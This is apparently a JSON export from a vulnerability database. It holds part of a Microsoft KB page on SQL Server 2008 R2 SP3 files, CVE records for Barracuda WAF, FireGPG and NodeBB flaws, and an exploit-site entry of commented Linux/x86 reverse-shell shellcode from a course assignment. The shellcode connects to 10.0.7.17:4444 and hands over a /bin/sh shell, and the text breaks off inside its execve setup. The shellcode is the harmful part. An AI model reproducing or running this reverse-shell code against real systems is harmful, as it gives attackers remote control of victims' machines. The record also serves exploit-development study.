12, 2014</td><td class=\"sbody-td\">SQL service</td></tr></tbody></table></div><h3 class=\"sbody-h3\">Select the correct file to download and install</h3>The SQL Server 2008 R2 SP3 download page contains the system requirements for installing SQL Server 2008 R2 SP3 and basic installation instructions. For additional documentation about how to upgrade installed SQL Server 2008 R2 components with a SQL Server 2008 R2 servicing update, see <a href=\"http://msdn.microsoft.com/library/dd631803(sql.10).aspx\" id=\"kb-link-6\" target=\"_self\">SQL Server 2008 R2 Servicing Documentation</a>.<br/><br/>For more information about how to install SQL Server 2008 R2, see <a href=\"http://go.microsoft.com/fwlink/?linkid=154143\" id=\"kb-link-7\" target=\"_self\">SQL Server 2008 R2 Installation</a>.<br/><br/>Use the following table to identify the location and name of the file to download based on your currently installed version. The download pages provide system requirements and basic installation instructions.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Version you currently have installed</th><th class=\"sbody-th\">Action you want to take</th><th class=\"sbody-th\">File to download and install</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 32-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 32-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 32-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-9\" target=\"_self\">SQLManagementStudio_x86_ENU.exe</a> install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP2 Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 64-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 64-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install Server 2008 R2 including SP2</td><td class=\"sbody-td\"><a href=\"http://go.microsoft.com/fwlink/?linkid=251791\" id=\"kb-link-11\" target=\"_self\">SQL Server 2008 R2 SP2 \u2013 Express Edition</a> and then SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2 Management Studio</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-12\" target=\"_self\">SQLManagementStudio_x64_ENU.exe</a> to install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr></tbody></table></div><span class=\"text-base\">Note</span> After you install the service pack, the SQL Service version should be reflected as 10.50.6000.34.<div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Copyright attributions</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li><span>This product contains software derived from the Xerox Secure Hash Function.</span></li><li><span>This product includes software from the zlib general purpose compression library.</span></li><li><span>Parts of this software are based in part on the work of RSA Data Security, Inc. Because Microsoft has included the RSA Data Security, Inc., software in this product, Microsoft is required to include the text below that accompanied such software: </span><ul class=\"sbody-free_list\"><li><span>Copyright 1990, RSA Data Security, Inc. All rights reserved.</span></li><li><span>License to copy and use this software is granted provided that it is identified as the \"RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as \"derived from the RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing the derived work.</span></li><li><span>RSA Data Security, Inc., makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided \"as is\" without express or implied warranty of any kind.</span></li></ul><span>These notices must be retained in any copies of any part of this documentation or software.</span></li><li><span>The Reporting Services mapping feature uses data from TIGER/Line Shapefiles that are provided courtesy of the U.S. Census Bureau (<a href=\"http://go.microsoft.com/fwlink/?linkid=179079\" id=\"kb-link-13\" target=\"_self\">http://www.census.gov/</a>). TIGER/Line Shapefiles are an extract of selected geographic and cartographic information from the Census MAF/TIGER database. TIGER/Line Shapefiles are available without charge from the U.S. Census Bureau. To obtain more information about the TIGER/Line shapefiles, go to <a href=\"http://go.microsoft.com/fwlink/?linkid=179080\" id=\"kb-link-14\" target=\"_self\">http://www.census.gov/geo/www/tiger</a>. The boundary information in the TIGER/Line Shapefiles is for statistical data collection and tabulation purposes only; its depiction and designation for statistical purposes does not constitute a determination of jurisdictional authority, rights of ownership, or entitlement, and does not reflect legal land descriptions. Census TIGER and TIGER/Line are registered trademarks of the U.S. Bureau of the Census.</span></li></ul><span>Copyright 2012 Microsoft. All rights reserved. </span></div></div></div></div></div><h2>References</h2><div class=\"kb-references-section section\"><span>For more information about how to determine the current SQL Server version and edition, click the following article number to go to the article in the Microsoft Knowledge Base: <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/321185\" id=\"kb-link-15\">321185 </a> <br/> How to identify your SQL Server version and edition <br/> </div></span><span>The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.</span></div></body></html>", "edition": 4, "modified": "2020-10-20T09:34:04", "id": "KB2979597", "href": "https://support.microsoft.com/en-us/help/2979597/", "published": "2020-10-20T09:34:04", "title": "KB2979597 - SQL Server 2008 R2 Service Pack 3 release information", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-05-24T18:49:09", "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "published": "2018-05-24T00:00:00", "title": "Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) #Shellcode (101 Bytes)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30438", "href": "https://0day.today/exploit/description/30438", "sourceData": "/* Name : Jonathan \"Chops\" Crosby\r\n * Email : [email\u00a0protected]\r\n * Twitter : @securitychops\r\n * Website : https://securitychops.com\r\n * Blog Post : https://securitychops.com/2018/05/21/slae-assignment-2-reverse-shell-tcp-shellcode.html\r\n * Student ID : SLAE-1250\r\n * Assignment 2 : Reverse Shell TCP (Linux/x86)\r\n * Shellcode Length : 101 bytes\r\n * Shellcode Purpose: Initiate a reverse shell back to the ip address / port number on shellcode execution\r\n *\r\n * Assembly code to generate shellcode in provided C program:\r\n \r\n; assemble/link assembly with: \r\n; nasm -f elf32 -o shellcode.o shellcode.nasm\r\n; ld -o shellcode shellcode.o\r\n \r\nglobal _start\r\n \r\nsection .text\r\n_start:\r\n \r\n; for all socket based calls we will need to use socketcall\r\n; http://man7.org/linux/man-pages/man2/socketcall.2.html\r\n; \r\n; the relevant calls we will need to make will be:\r\n; -----\r\n; SYS_SOCKET socket(2) 0x01\r\n; SYS_BIND bind(2) 0x02\r\n; SYS_CONNECT connect(2) 0x03\r\n; SYS_LISTEN listen(2) 0x04\r\n; SYS_ACCEPT accept(2) 0x05\r\n; -----\r\n; due to the way the registers need to be loaded up we will need to\r\n; make the call to cocketcall by loading the following info into \r\n; the following registers\r\n; -----\r\n; eax : 0x66 (this is the value of socketcall)\r\n; ebx : SYS_* value (0x01, etc)\r\n; ecx : pointer to address on stack of parameters to subfunction\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int socket(domain, type , protocol)\r\n; ASM version: socketcall(SYS_SOCKET, socket(AF_INET,SOCK_STREAM,IPPROTO_IP))\r\n; Returns : socketid into eax\r\n; ----- \r\n; Param Values: \r\n; #define AF_INET 2 // Internet IP Protocol\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n;\r\n; #define SOCK_STREAM 1 // stream (connection) socket\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n;\r\n; #define IPPROTO_IP 0\r\n; If the protocol argument is zero, the default protocol for this address family and type shall be used. \r\n; http://pubs.opengroup.org/onlinepubs/009695399/functions/socket.html\r\n; -----\r\n; Registers before calling socketcall:\r\n;\r\n; /---eax---\\ /---ebx---\\ /--------ecx---------\\ \r\n; | 0x66 | | 0x01 | | byte, byte, byte |\r\n; \\---------/ \\---------/ | 0x02 0x01 0x00 |\r\n; \\--------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; push params to the stack last first\r\n \r\nxor eax, eax ; zeroing out edx to set IPPROTO_IP to 0\r\npush eax ; pushing IPPROTO_IP onto stack\r\npush byte 0x01 ; pushing SOCK_STREAM onto stack\r\npush byte 0x02 ; pushing AF_INET onto stack\r\n \r\nmov ecx, esp ; moving address of parameter structure into ecx \r\n \r\nxor eax, eax ; zeroing out eax\r\nmov al, 0x66 ; moving socketcall value into eax\r\n \r\nxor ebx, ebx ; zeroing out ebx\r\nmov bl, 0x01 ; moving SYS_SOCKET into ebx\r\n \r\nint 0x80 ; calling interupt which triggers socketcall\r\n \r\n; registers after calling socktcall\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\\r\n; | socketid | | 0x01 | | *address to struct |\r\n; \\------------/ \\---------/ \\---------------------/\r\n \r\n; eax now contains our socketid, since eax is volitale \r\n; lets put it somewhere safe, like esi\r\n \r\nxchg eax, esi ; esi now contains our socketid\r\n ; and eax contains whatever was in esi\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\ /---esi---\\\r\n; | garbage | | 0x01 | | *address to struct | | socketid |\r\n; \\------------/ \\---------/ \\---------------------/ \\---------/\r\n \r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));\r\n; ASM version: socketcall(SYS_CONNECT, connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));\r\n; -----\r\n; Param Values:\r\n; socketid // currently stored in esi\r\n; \r\n; &serverAddress // memory on the stack for sockaddr\r\n; * http://pubs.opengroup.org/onlinepubs/7908799/xns/netinetin.h.html \r\n; * Values of this type must be cast to struct sockaddr for use with the socket interfaces\r\n; \r\n; this parameter is a struct of sockaddr_in which has the following structure\r\n;\r\n; struct sockaddr_in {\r\n; sa_family_t sin_family; // address family: AF_INET\r\n; in_port_t sin_port; // port in network byte order\r\n; struct in_addr sin_addr; // internet address\r\n; // Internet address.\r\n; struct in_addr {\r\n; uint32_t s_addr; // address in network byte order\r\n; };\r\n;\r\n; sa_family_t\r\n; #define AF_INET 2 // Internet IP Protocol\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n; \r\n; in_port_t // port in network byte order / big endian\r\n; https://en.wikipedia.org/wiki/Endianness\r\n; port 9876 would be: word 0x2694\r\n;\r\n; sin_addr // uint32_t ia 4 bytes\r\n; ip bound to will be XXX.XXX.XXX.XXX\r\n; ip would be: dword 0xFFFF or whatever IP will end up being reversed\r\n;\r\n; sizeof(serverAddress) // this value represents bytes, so 4 bytes is 32bits\r\n; the value here is 16 bytes or 0x10h which is ultimaly 32bits\r\n; -----\r\n;\r\n; Registers before calling socketcall: \r\n;\r\n; /---eax---\\ /---ebx---\\ /--------------------------ecx-----------------------------\\\r\n; | 0x66 | | 0x03 | | socketid, mem of server address struct, size of struct |\r\n; \\---------/ \\---------/ | esi ecx 0x10 |\r\n; \\-------------------------|--------------------------------/\r\n \r\n; we need to create the first stack pointer for sockaddr_in\r\n \r\nxor edx, edx\r\n \r\npush edx\r\n \r\nmov byte [esp] , 0x0a ; 10\r\nmov byte [esp+2], 0x07 ; 07\r\nmov byte [esp+3], 0x11 ; 17\r\n \r\n ; mov byte [esp+1], 0x00 left out on purpose since\r\n ; this would put 0x00 in the final shellcode, which\r\n ; is generally considered bad practice since null\r\n ; tends to cause issues when executing\r\n \r\npush word 0x5C11 ; port number (0x115C is 4444 so we push little endian)\r\n \r\npush word 0x02 ; AF_INET - which is 0x02\r\n \r\nmov ecx, esp ; move stack pointer to ecx\r\n \r\npush byte 0x10 ; 16 byts long (or 32bit)\r\n \r\npush ecx ; pushing sockaddr_in into esp\r\n \r\npush esi ; sockid already in esi, so pushing it\r\n \r\nmov ecx, esp ; moving stack pointer to ecx\r\n \r\n; from the previous call ebx is already 0x01\r\n; lets increment it by one\r\ninc ebx ; increasing ebx from 1 to 2\r\ninc ebx ; and from 2 to 3\r\n \r\nxor eax, eax ; zeroing out eax\r\nmov al, 0x66 ; moving socketcall value into eax\r\n \r\nint 0x80 ; calling interupt which triggers socketcall\r\n \r\n; registers after calling socktcall\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\ /---esi---\\\r\n; | uneeded | | 0x03 | | *address to struct | | socketid |\r\n; \\------------/ \\---------/ \\---------------------/ \\---------/\r\n \r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int dup2(clientid, localDiscripToDuplicate);\r\n; ASM version: standard syscall using same format as above\r\n; ----- \r\n; Param Values: \r\n; clientid // currently stored in eax\r\n;\r\n; localDiscripToDuplicate // 0, 1, 2 file descriptors to duplicate\r\n; -----\r\n; Registers before calling dup2: \r\n;\r\n; /---eax---\\ /---ebx----\\ /-------------ecx---------------\\\r\n; | 0x3f | | sockid | | file descriptor to dplicate |\r\n; \\---------/ \\----------/ | 2, 1 adnd 0 |\r\n; \\-------------------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n \r\nmov ebx, esi ; moving socketid from eax to ebx\r\n \r\n ; now we need a loop to run through for\r\n ; 0, 1 and 2\r\n \r\nxor ecx, ecx ; zeroing out ecx\r\nmov cl, 0x03 ; moving syscall for dup2\r\n \r\ndupin:\r\n xor eax, eax ; zeroing out eax\r\n mov al, 0x3f ; setting syscall value for dup2\r\n dec cl ; decreasing loop counter since we\r\n ; will need to deal with only 2, 1 and 0\r\n int 0x80 ; syscall triggering listen\r\n jnz dupin ; if the zero flag is not set then do it again\r\n \r\n; registers after calling socktcall\r\n; \r\n; since we don't care about any return values\r\n; we don't bother tracking register values\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; ASM version: standard syscall using same format as above\r\n; ----- \r\n; Param Values: \r\n; filename // path of elf32 to execute\r\n;\r\n; argv // standard argv, first param is full path to elf32 null terminated\r\n;\r\n; envp // any environmental specific things, null in our case\r\n; -----\r\n; Registers before calling execve: \r\n;\r\n; /---eax---\\ /----------------ebx--------------------\\ /-------------ecx---------------\\\r\n; | 0x0B | | stack address if //bin/sh,0x00000000 | | stack address to 0x00000000 |\r\n; \\---------/ \\---------------------------------------/ \\-------------------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; call execve in order to complete the local bind shell\r\n; execve(\"/bin/sh\", argv[], envp[]);\r\n; argv needs to be Address of /bin/sh, 0x00000000\r\n; this is because when you call something from bash, etc\r\n; argv will contain the path of the executable within it\r\n \r\n; before starting we look like:\r\n; execve(NOT-SET-YET, NOT-SET-YET, NOT-SET-YET)\r\n \r\n; First we need to get 0x00000000 into ebx somehow\r\n; so lets zero out eax and push it to esp\r\n \r\nxor eax, eax ; zeroing out eax to make it 0x00000000\r\npush eax ; pushing 0x00000000 onto the stack (esp)\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; esp now looks like: 0x00000000;\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; pushing \"//bin/sh\" (8 bytes and reverses due to little endian)\r\npush 0x68732f6e ; hs/n : 2f68732f into esp\r\npush 0x69622f2f ; ib// : 6e69622f into esp\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n;esp now looks like: \"//bin/sh,0x00000000\";\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; since we have been pushing to the stack, we have been pushing to esp\r\n; now we need to get \"//bin/sh,0x00000000\" into ebx since it is the first parameter for execve\r\n; since esp contains exactly what we need we move it to ebx\r\n \r\nmov ebx, esp ; moving the param to ebx\r\n ; ebx now contains \"//bin/sh,0x00000000\"\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", NOT-SET-YET, NOT-SET-YET);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; now we need to get 0x00000000 into edx\r\npush eax ; eax is still 0x00000000 so push it to esp\r\nmov edx, esp ; we need to move a 0x00000000 into \r\n ; the third parameter in edx\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", NOT-SET-YET, 0x00000000);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; the second parameter is needs to be \"//bin/sh,0x00000000\"\r\n; which we can accomplish by moving ebx onto the stack\r\n; and then moving esp into ecx since it will be on the stack\r\n \r\npush ebx ; pushing \"//bin/sh,0x00000000\" back to the stack\r\nmov ecx, esp ; moving the address of ebx (on the stack) to ecx\r\n 